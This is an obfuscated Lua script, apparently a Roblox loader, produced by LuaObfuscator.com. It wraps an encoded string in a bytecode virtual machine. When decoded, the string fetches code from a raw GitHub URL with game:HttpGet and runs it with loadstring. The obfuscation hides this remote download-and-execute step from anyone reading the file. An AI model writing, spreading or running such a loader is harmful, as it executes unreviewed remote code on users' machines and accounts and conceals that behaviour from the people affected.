--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v78=v2(v0(v30,16));if v19 then local v87=v5(v78,v19);v19=nil;return v87;else return v78;end end end);local function v20(v31,v32,v33) if v33 then local v79=(v31/(2^(v32-(2 -1))))%((5 -(880 -(282 + 595)))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v79-(v79%(932 -((2494 -(1523 + 114)) + 74))) ;else local v80=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v80 + v80))>=v80) and (1 + 0 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (364 -108)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (12 -9) );v18=v18 + ((288 -167) -(32 + (157 -72))) ;return (v40 * (16441815 + 335401)) + (v39 * (14533 + 51003)) + (v38 * (1213 -(892 + 65))) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,(1 + 0) -0 ,20) * ((352 -(87 + 263))^(212 -(67 + (200 -87))))) + v41 ;local v45=v20(v42,16 + 5 + 0 ,75 -44 );local v46=((v20(v42,32)==(1 + 0)) and  -(3 -2)) or (953 -(802 + 150)) ;if (v45==(0 -0)) then if (v44==(0 -0)) then return v46 * (0 + 0) ;else local v88=997 -(915 + 82) ;while true do if (v88==0) then v45=2 -1 ;v43=0 + 0 ;break;end end end elseif (v45==(2838 -(368 + 423))) then return ((v44==0) and (v46 * (((3 -2) -0)/(1187 -(1069 + 118))))) or (v46 * NaN) ;end return v8(v46,v45-(2320 -1297) ) * (v43 + (v44/(2^(113 -61)))) ;end local function v25(v47) local v48=18 -(10 + 8) ;local v49;local v50;while true do if (v48==(0 -(772 -(201 + 571)))) then v49=nil;if  not v47 then v47=v23();if (v47==((1580 -(116 + 1022)) -(416 + 26))) then return "";end end v48=(3 + 0) -2 ;end if (v48==(2 + (4 -3))) then return v6(v50);end if (v48==(3 -1)) then v50={};for v89=439 -(145 + 293) , #v49 do v50[v89]=v2(v1(v3(v49,v89,v89)));end v48=3;end if (v48==(431 -(44 + 386))) then v49=v3(v16,v18,(v18 + v47) -(1487 -(998 + 488)) );v18=v18 + v47 ;v48=1 + 1 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 + 0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();while true do if (v51~= #"\\") then else local v84=(function() return 0 -0 ;end)();while true do if (v84==0) then v56=(function() return v23();end)();v57=(function() return {};end)();v84=(function() return 1;end)();end if (v84~=(4 -2)) then else v51=(function() return 1208 -(696 + 510) ;end)();break;end if (v84~=(1 -0)) then else for v104= #",",v56 do local v105=(function() return 1262 -(1091 + 171) ;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if ((1 + 0)==v105) then v108=(function() return nil;end)();while true do if (v106==0) then v107=(function() return v21();end)();v108=(function() return nil;end)();v106=(function() return 1;end)();end if (v106~=(3 -2)) then else if (v107== #"[") then v108=(function() return v21()~=(0 -0) ;end)();elseif (v107==(287 -(134 + 151))) then v108=(function() return v24();end)();elseif (v107== #"xnx") then v108=(function() return v25();end)();end v57[v104]=(function() return v108;end)();break;end end break;end if ((374 -(123 + 251))~=v105) then else v106=(function() return 0 -0 ;end)();v107=(function() return nil;end)();v105=(function() return 699 -(208 + 490) ;end)();end end end v55[ #"asd"]=(function() return v21();end)();v84=(function() return 6 -4 ;end)();end end end if (v51~=(1 + 1)) then else for v91= #"}",v23() do local v92=(function() return v21();end)();if (v20(v92, #"{", #"\\")~=(0 -0)) then else local v100=(function() return 0 + 0 ;end)();local v101=(function() return;end)();local v102=(function() return;end)();local v103=(function() return;end)();while true do if (v100==2) then if (v20(v102, #"!", #",")== #"~") then v103[838 -(660 + 176) ]=(function() return v57[v103[7 -5 ]];end)();end if (v20(v102,1826 -(1195 + 629) ,1 + 1 )~= #"}") then else v103[ #"asd"]=(function() return v57[v103[ #"gha"]];end)();end v100=(function() return 3 -0 ;end)();end if ((244 -(187 + 54))~=v100) then else if (v20(v102, #"asd", #"asd")~= #">") then else v103[ #"0313"]=(function() return v57[v103[ #".dev"]];end)();end v52[v91]=(function() return v103;end)();break;end if (v100~=0) then else v101=(function() return v20(v92,204 -(14 + 188) , #"asd");end)();v102=(function() return v20(v92, #"0836",681 -(534 + 141) );end)();v100=(function() return 1;end)();end if ((1 + 0)~=v100) then else local v127=(function() return 0;end)();while true do if (v127==(1 + 0)) then v100=(function() return 2;end)();break;end if (v127~=(0 + 0)) then else v103=(function() return {v22(),v22(),nil,nil};end)();if (v101==0) then local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (v169==0) then v170=(function() return 0 -0 ;end)();while true do if (v170~=(0 + 0)) then else v103[ #"91("]=(function() return v22();end)();v103[ #".com"]=(function() return v22();end)();break;end end break;end end elseif (v101== #"[") then v103[ #"91("]=(function() return v23();end)();elseif (v101==(3 -1)) then v103[ #"xxx"]=(function() return v23() -(2^(1652 -(1373 + 263))) ;end)();elseif (v101== #"-19") then local v177=(function() return 0 -0 ;end)();local v178=(function() return;end)();while true do if (v177~=(1000 -(451 + 549))) then else v178=(function() return 0 + 0 ;end)();while true do if (v178==0) then v103[ #"xnx"]=(function() return v23() -((5 -3)^(24 -8)) ;end)();v103[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v127=(function() return 1 -0 ;end)();end end end end end end for v93= #"[",v23() do v53[v93-#"," ]=(function() return v28();end)();end return v55;end if (v51==(0 + 0)) then local v85=(function() return 0 + 0 ;end)();local v86=(function() return;end)();while true do if (v85~=(0 + 0)) then else v86=(function() return 396 -(115 + 281) ;end)();while true do if (v86==0) then v52=(function() return {};end)();v53=(function() return {};end)();v86=(function() return 1;end)();end if (v86~=(2 -1)) then else v54=(function() return {};end)();v55=(function() return {v52,v53,nil,v54};end)();v86=(function() return 2 + 0 ;end)();end if (v86==(4 -2)) then v51=(function() return  #">";end)();break;end end break;end end end end end local function v29(v58,v59,v60) local v61=v58[342 -(218 + (599 -(41 + 435))) ];local v62=v58[984 -(18 + (1965 -(938 + 63))) ];local v63=v58[1584 -(1535 + 46) ];return function(...) local v64=v61;local v65=v62;local v66=v63;local v67=v27;local v68=1;local v69= -(1 + 0);local v70={};local v71={...};local v72=v12("#",...) -(1 + 0) ;local v73={};local v74={};for v81=560 -(306 + 196 + 58) ,v72 do if (v81>=v66) then v70[v81-v66 ]=v71[v81 + (1126 -(936 + 189)) + 0 ];else v74[v81]=v71[v81 + (127 -(116 + 10)) ];end end local v75=(v72-v66) + (1 -0) ;local v76;local v77;while true do v76=v64[v68];v77=v76[1468 -(899 + 568) ];if (v77<=(6 -3)) then if ((123<=2579) and (v77<=(1 + 0))) then if (v77>(0 + 0)) then local v109=0 -0 ;local v110;local v111;local v112;local v113;local v114;while true do if ((v109==((1 + 1) -(1614 -(1565 + 48)))) or (846>=2368)) then v76=v64[v68];v74[v76[605 -(268 + 335) ]]=v60[v76[1554 -(1126 + 425) ]];v68=v68 + (291 -(60 + 230)) ;v76=v64[v68];v74[v76[(252 + 155) -(118 + 287) ]]=v60[v76[575 -(426 + 146) ]];v68=v68 + 1 + 0 ;v109=2;end if (((5 -3)==v109) or (4012<=3358)) then v76=v64[v68];v114=v76[1458 -(282 + 1174) ];v113=v74[v76[814 -((1707 -(782 + 356)) + 242) ]];v74[v114 + (2 -1) ]=v113;v74[v114]=v113[v76[18 -(281 -(176 + 91)) ]];v68=v68 + 1 + 0 ;v109=1027 -(706 + 318) ;end if (v109==(1254 -(721 + (1380 -850)))) then v76=v64[v68];v74[v76[1273 -(945 + 326) ]]=v76[7 -4 ];v68=v68 + 1 + 0 ;v76=v64[v68];v114=v76[702 -(271 + 429) ];v111,v112=v67(v74[v114](v13(v74,v114 + 1 + 0 ,v76[1503 -(1408 + (134 -42)) ])));v109=1090 -(461 + (1717 -(975 + 117))) ;end if ((1494<=3005) and (v109==(1293 -(993 + 295)))) then v74[v114]=v74[v114](v13(v74,v114 + ((1877 -(157 + 1718)) -(1 + 0)) ,v69));v68=v68 + 1 + 0 ;v76=v64[v68];v74[v76[1173 -(418 + 753) ]]();v68=v68 + 1 + 0 ;v76=v64[v68];v109=1 + 5 ;end if ((v109==(2 + 4)) or (3111==2134)) then do return;end break;end if (v109==(2 + 2)) then v69=(v112 + v114) -((3 -2) + 0) ;v110=529 -(406 + 123) ;for v161=v114,v69 do local v162=0 + 0 ;while true do if (v162==(1769 -(1749 + 20))) then v110=v110 + 1 + 0 ;v74[v161]=v111[v110];break;end end end v68=v68 + (1323 -(1249 + (249 -176))) ;v76=v64[v68];v114=v76[1 + 1 ];v109=1207 -(373 + 829) ;end if (v109==(731 -(476 + 255))) then v110=nil;v111,v112=nil;v113=nil;v114=nil;v74[v76[1147 -(466 + 679) ]]={};v68=v68 + (2 -1) ;v109=2 -1 ;end end else v74[v76[1902 -(106 + 1794) ]]={};end elseif ((2355==2355) and (v77==(1 + 1))) then v74[v76[1 + 1 ]]();else local v116=0 -(1018 -(697 + 321)) ;local v117;local v118;while true do if (v116==(0 -0)) then v117=v76[1 + 1 ];v118=v74[v76[3 -0 ]];v116=1;end if (v116==(115 -(4 + (299 -189)))) then v74[v117 + (585 -(57 + 527)) ]=v118;v74[v117]=v118[v76[1431 -(41 + 1386) ]];break;end end end elseif ((v77<=(108 -(17 + 86))) or (588<=432)) then if ((4797>=3895) and (v77>(3 + 1))) then local v119=0 -0 ;local v120;local v121;local v122;local v123;while true do if (v119==(1 + (0 -0))) then v69=(v122 + v120) -(2 -1) ;v123=166 -(122 + 44) ;v119=2 -0 ;end if ((3577==3577) and (v119==(5 -3))) then for v163=v120,v69 do v123=v123 + (3 -2) ;v74[v163]=v121[v123];end break;end if ((3794>3693) and (v119==((0 -0) + 0))) then v120=v76[1 + 0 + 1 ];v121,v122=v67(v74[v120](v13(v74,v120 + (1 -0) + 0 ,v76[5 -2 ])));v119=66 -(30 + 35) ;end end else do return;end end elseif (v77<=(5 + 1)) then v74[v76[1259 -(1043 + 214) ]]=v60[v76[11 -8 ]];elseif (v77==(1668 -(1477 + 184))) then v74[v76[1214 -((865 -542) + 889) ]]=v76[7 -4 ];else local v130=580 -(361 + 219) ;local v131;while true do if ((v130==(0 -(1227 -(322 + 905)))) or (1275==4100)) then v131=v76[322 -(53 + 267) ];v74[v131]=v74[v131](v13(v74,v131 + 1 + (611 -(602 + 9)) ,v69));break;end end end v68=v68 + ((1603 -(449 + 740)) -(15 + 398)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403513Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F446F6A63616E616C6465616E696D652F736162656D6F736F712D2F726566732F68656164732F6D61696E2F6265746100094Q00017Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
